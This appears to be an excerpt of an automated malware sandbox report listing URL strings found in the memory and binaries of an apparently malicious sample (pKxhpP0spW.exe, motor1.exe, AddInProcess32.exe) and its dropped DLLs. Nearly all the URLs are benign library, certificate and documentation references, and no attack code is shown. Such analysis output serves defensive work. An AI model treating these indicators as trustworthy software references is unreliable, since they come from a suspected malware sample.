Source: motor1.exe, 00000004.00000002.2539797410.0000022D5F59E000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451740824.0000022D5F535000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000002.2541254363.0000026DF6050000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451689953.0000022D5F59F000.00000004.00000020.00020000.00000000.sdmp, FndString.dll.4.dr, WebUid.dll.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: motor1.exe, 00000004.00000002.2539797410.0000022D5F59E000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451740824.0000022D5F535000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000002.2541254363.0000026DF6050000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451689953.0000022D5F59F000.00000004.00000020.00020000.00000000.sdmp, FndString.dll.4.dr, WebUid.dll.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: motor1.exe, 00000004.00000002.2539797410.0000022D5F59E000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451740824.0000022D5F535000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000002.2541254363.0000026DF6050000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451689953.0000022D5F59F000.00000004.00000020.00020000.00000000.sdmp, FndString.dll.4.dr, WebUid.dll.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://code.google.com/p/closure-compiler/wiki/SourceMaps
Source: motor1.exe, 00000004.00000002.2539797410.0000022D5F59E000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451740824.0000022D5F535000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000002.2541254363.0000026DF6050000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451689953.0000022D5F59F000.00000004.00000020.00020000.00000000.sdmp, FndString.dll.4.dr, WebUid.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: motor1.exe, 00000004.00000002.2539797410.0000022D5F59E000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451740824.0000022D5F535000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000002.2541254363.0000026DF6050000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451689953.0000022D5F59F000.00000004.00000020.00020000.00000000.sdmp, FndString.dll.4.dr, WebUid.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: motor1.exe, 00000004.00000002.2539797410.0000022D5F59E000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451740824.0000022D5F535000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000002.2541254363.0000026DF6050000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451689953.0000022D5F59F000.00000004.00000020.00020000.00000000.sdmp, FndString.dll.4.dr, WebUid.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: motor1.exe, 00000004.00000002.2539797410.0000022D5F59E000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451740824.0000022D5F535000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000002.2541254363.0000026DF6050000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451689953.0000022D5F59F000.00000004.00000020.00020000.00000000.sdmp, FndString.dll.4.dr, WebUid.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: motor1.exe, 00000004.00000002.2539797410.0000022D5F59E000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451740824.0000022D5F535000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000002.2541254363.0000026DF6050000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451689953.0000022D5F59F000.00000004.00000020.00020000.00000000.sdmp, FndString.dll.4.dr, WebUid.dll.4.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: motor1.exe, 00000004.00000000.2408532196.00007FF7EDDDC000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: http://ffmpeg.org).
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://html4/loose.dtd
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: http://mp3licensing.com.
Source: motor1.exe, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: http://mp3licensing.com/.
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://narwhaljs.org)
Source: motor1.exe, 00000004.00000002.2539797410.0000022D5F59E000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451740824.0000022D5F535000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000002.2541254363.0000026DF6050000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451689953.0000022D5F59F000.00000004.00000020.00020000.00000000.sdmp, FndString.dll.4.dr, WebUid.dll.4.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: motor1.exe, 00000004.00000002.2539797410.0000022D5F59E000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451740824.0000022D5F535000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000002.2541254363.0000026DF6050000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451689953.0000022D5F59F000.00000004.00000020.00020000.00000000.sdmp, FndString.dll.4.dr, WebUid.dll.4.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: motor1.exe, 00000004.00000002.2539797410.0000022D5F59E000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451740824.0000022D5F535000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000002.2541254363.0000026DF6050000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451689953.0000022D5F59F000.00000004.00000020.00020000.00000000.sdmp, FndString.dll.4.dr, WebUid.dll.4.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: motor1.exe, 00000004.00000002.2539797410.0000022D5F59E000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451740824.0000022D5F535000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000002.2541254363.0000026DF6050000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451689953.0000022D5F59F000.00000004.00000020.00020000.00000000.sdmp, FndString.dll.4.dr, WebUid.dll.4.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: http://opensource.org/licenses/BSD-3-Clause
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: http://opensource.org/licenses/BSD-3-Clause.
Source: AddInProcess32.exe, 00000005.00000002.4839943151.0000000002791000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://src.chromium.org/viewvc/blink/trunk/Source/devtools/front_end/SourceMap.js
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://userguide.icu-project.org/strings/properties
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.3waylabs.com/nw/WWW/products/wizcon/vt220.html
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: http://www.boost.org/LICENSE_1_0.txt
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: http://www.boost.org/LICENSE_1_0.txt.
Source: motor1.exe, 00000004.00000002.2539797410.0000022D5F59E000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451740824.0000022D5F535000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000002.2541254363.0000026DF6050000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451689953.0000022D5F59F000.00000004.00000020.00020000.00000000.sdmp, FndString.dll.4.dr, WebUid.dll.4.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: motor1.exe, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: http://www.ffmpeg.org)
Source: motor1.exe, 00000004.00000000.2408532196.00007FF7EDDDC000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: http://www.ffmpeg.org).
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: http://www.ffmpeg.org/).
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.midnight-commander.org/browser/lib/tty/key.c
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: http://www.mpegla.com.
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.squid-cache.org/Doc/config/half_closed_clients/
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.unicode.org/copyright.html
Source: motor1.exe, 00000004.00000002.2544278781.00007FFD94758000.00000002.00000001.01000000.00000007.sdmp, motor1.exe, 00000004.00000002.2544982962.00007FFD94832000.00000004.00000001.01000000.00000007.sdmp, motor1.exe, 00000015.00000002.2601476755.00007FFD929C1000.00000004.00000001.01000000.0000002C.sdmp, motor1.exe, 00000015.00000002.2601305286.00007FFD928E8000.00000002.00000001.01000000.0000002C.sdmp	String found in binary or memory: https://aka.ms/GlobalizationInvariantMode
Source: motor1.exe, 00000004.00000002.2544278781.00007FFD94758000.00000002.00000001.01000000.00000007.sdmp, motor1.exe, 00000004.00000002.2544982962.00007FFD94832000.00000004.00000001.01000000.00000007.sdmp, motor1.exe, 00000015.00000002.2601476755.00007FFD929C1000.00000004.00000001.01000000.0000002C.sdmp, motor1.exe, 00000015.00000002.2601305286.00007FFD928E8000.00000002.00000001.01000000.0000002C.sdmp	String found in binary or memory: https://aka.ms/dotnet-warnings/
Source: motor1.exe, 00000004.00000002.2544278781.00007FFD94758000.00000002.00000001.01000000.00000007.sdmp, motor1.exe, 00000015.00000002.2601305286.00007FFD928E8000.00000002.00000001.01000000.0000002C.sdmp	String found in binary or memory: https://aka.ms/nativeaot-compatibility
Source: motor1.exe, 00000015.00000002.2601305286.00007FFD928E8000.00000002.00000001.01000000.0000002C.sdmp	String found in binary or memory: https://aka.ms/nativeaot-compatibilityY
Source: motor1.exe, 00000015.00000002.2601476755.00007FFD929C1000.00000004.00000001.01000000.0000002C.sdmp	String found in binary or memory: https://aka.ms/nativeaot-compatibilityh
Source: motor1.exe, 00000004.00000002.2544278781.00007FFD94758000.00000002.00000001.01000000.00000007.sdmp, motor1.exe, 00000015.00000002.2601305286.00007FFD928E8000.00000002.00000001.01000000.0000002C.sdmp	String found in binary or memory: https://aka.ms/nativeaot-compatibilityy
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://bugs.chromium.org/p/v8/issues/detail?id=10201
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://bugs.chromium.org/p/v8/issues/detail?id=10704
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://bugs.chromium.org/p/v8/issues/detail?id=6593
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=745678
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://code.google.com/p/chromium/issues/detail?id=25916
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://console.spec.whatwg.org/#clear
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://console.spec.whatwg.org/#console-namespace
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://console.spec.whatwg.org/#count
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://console.spec.whatwg.org/#count-map
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://console.spec.whatwg.org/#countreset
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://console.spec.whatwg.org/#table
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://crbug.com/v8/7848
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://crbug.com/v8/8520
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://cs.chromium.org/chromium/src/v8/tools/SourceMap.js?rcl=dd10454c1d
Source: motor1.exe, 00000004.00000002.2543383507.00007FFD944E2000.00000002.00000001.01000000.00000008.sdmp, motor1.exe, 00000004.00000002.2542632185.00007FFD94148000.00000002.00000001.01000000.0000000A.sdmp, motor1.exe, 00000004.00000000.2408388110.00007FF7EDD07000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000002.2541531038.00007FF7EDD07000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000002.2542097890.00007FFD93D7C000.00000002.00000001.01000000.00000014.sdmp, motor1.exe, 00000015.00000002.2603187948.00007FFD93A72000.00000002.00000001.01000000.0000001C.sdmp, motor1.exe, 00000015.00000002.2600550256.00007FF643557000.00000002.00000001.01000000.0000001A.sdmp, motor1.exe, 00000015.00000000.2546559477.00007FF643557000.00000002.00000001.01000000.0000001A.sdmp, motor1.exe, 00000015.00000002.2602655358.00007FFD9370C000.00000002.00000001.01000000.00000027.sdmp, motor1.exe, 00000015.00000002.2601968221.00007FFD92D38000.00000002.00000001.01000000.0000001F.sdmp, WebUid.dll.4.dr	String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: motor1.exe, 00000004.00000002.2543383507.00007FFD944E2000.00000002.00000001.01000000.00000008.sdmp, motor1.exe, 00000004.00000002.2542632185.00007FFD94148000.00000002.00000001.01000000.0000000A.sdmp, motor1.exe, 00000004.00000000.2408388110.00007FF7EDD07000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000002.2541531038.00007FF7EDD07000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000002.2542097890.00007FFD93D7C000.00000002.00000001.01000000.00000014.sdmp, motor1.exe, 00000015.00000002.2603187948.00007FFD93A72000.00000002.00000001.01000000.0000001C.sdmp, motor1.exe, 00000015.00000002.2600550256.00007FF643557000.00000002.00000001.01000000.0000001A.sdmp, motor1.exe, 00000015.00000000.2546559477.00007FF643557000.00000002.00000001.01000000.0000001A.sdmp, motor1.exe, 00000015.00000002.2602655358.00007FFD9370C000.00000002.00000001.01000000.00000027.sdmp, motor1.exe, 00000015.00000002.2601968221.00007FFD92D38000.00000002.00000001.01000000.0000001F.sdmp, WebUid.dll.4.dr	String found in binary or memory: https://curl.se/docs/hsts.html
Source: motor1.exe, 00000004.00000002.2543383507.00007FFD944E2000.00000002.00000001.01000000.00000008.sdmp, motor1.exe, 00000004.00000002.2542632185.00007FFD94148000.00000002.00000001.01000000.0000000A.sdmp, motor1.exe, 00000004.00000000.2408388110.00007FF7EDD07000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000002.2541531038.00007FF7EDD07000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000002.2542097890.00007FFD93D7C000.00000002.00000001.01000000.00000014.sdmp, motor1.exe, 00000015.00000002.2603187948.00007FFD93A72000.00000002.00000001.01000000.0000001C.sdmp, motor1.exe, 00000015.00000002.2600550256.00007FF643557000.00000002.00000001.01000000.0000001A.sdmp, motor1.exe, 00000015.00000000.2546559477.00007FF643557000.00000002.00000001.01000000.0000001A.sdmp, motor1.exe, 00000015.00000002.2602655358.00007FFD9370C000.00000002.00000001.01000000.00000027.sdmp, motor1.exe, 00000015.00000002.2601968221.00007FFD92D38000.00000002.00000001.01000000.0000001F.sdmp, WebUid.dll.4.dr	String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/SpiderMonkey/Parser_API
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Equality_comparisons_and_sameness#Loose_equa
Source: motor1.exe, 00000004.00000000.2408532196.00007FF7EDDDC000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://edu.movavi.com.
Source: motor1.exe, 00000004.00000000.2408532196.00007FF7EDDDC000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://edu.movavi.com/
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://edu.movavi.com/.
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://encoding.spec.whatwg.org
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://encoding.spec.whatwg.org/#textdecoder
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://encoding.spec.whatwg.org/#textencoder
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://esdiscuss.org/topic/isconstructor#content-11
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://fetch.spec.whatwg.org/
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://gist.github.com/XVilka/8346728#gistcomment-2823421
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/WICG/scheduling-apis
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/WebAssembly/esm-integration/issues/42
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/acornjs/acorn/blob/master/acorn/src/identifier.js#L23
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/acornjs/acorn/issues/575
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/addaleax/eventemitter-asyncresource
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/antirez/linenoise
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/chalk/ansi-regex/blob/HEAD/index.js
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/chalk/supports-color
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/chromium/chromium/blob/HEAD/third_party/blink/public/platform/web_crypto_algorith
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/da-x/rxvt-unicode/tree/v9.22-with-24bit-color
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/estree/estree/blob/a27003adf4fd7bfad44de9cef372a2eacd527b1c/es5.md#regexpliteral
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/google/caja/blob/HEAD/src/com/google/caja/ses/repairES5.js
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/google/caja/blob/HEAD/src/com/google/caja/ses/startSES.js
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/google/closure-compiler/wiki/Source-Maps
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/isaacs/color-support.
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/joyent/node/issues/3295.
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/libuv/libuv/pull/1501.
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/mafintosh/end-of-stream
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/mafintosh/pump
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/mysticatea/abort-controller
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node-v0.x-archive/issues/2876.
Source: pKxhpP0spW.exe, 00000001.00000003.2382394323.000000323D781000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/blob/1a96d83a223ff9f05f7d942fb84440d323f7b596/lib/internal/bootstrap/
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/commit/ec2822adaad76b126b5cccdeaa1addf2376c9aa6
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/commit/f7620fb96d339f704932f9bb9a0dceb9952df2d4
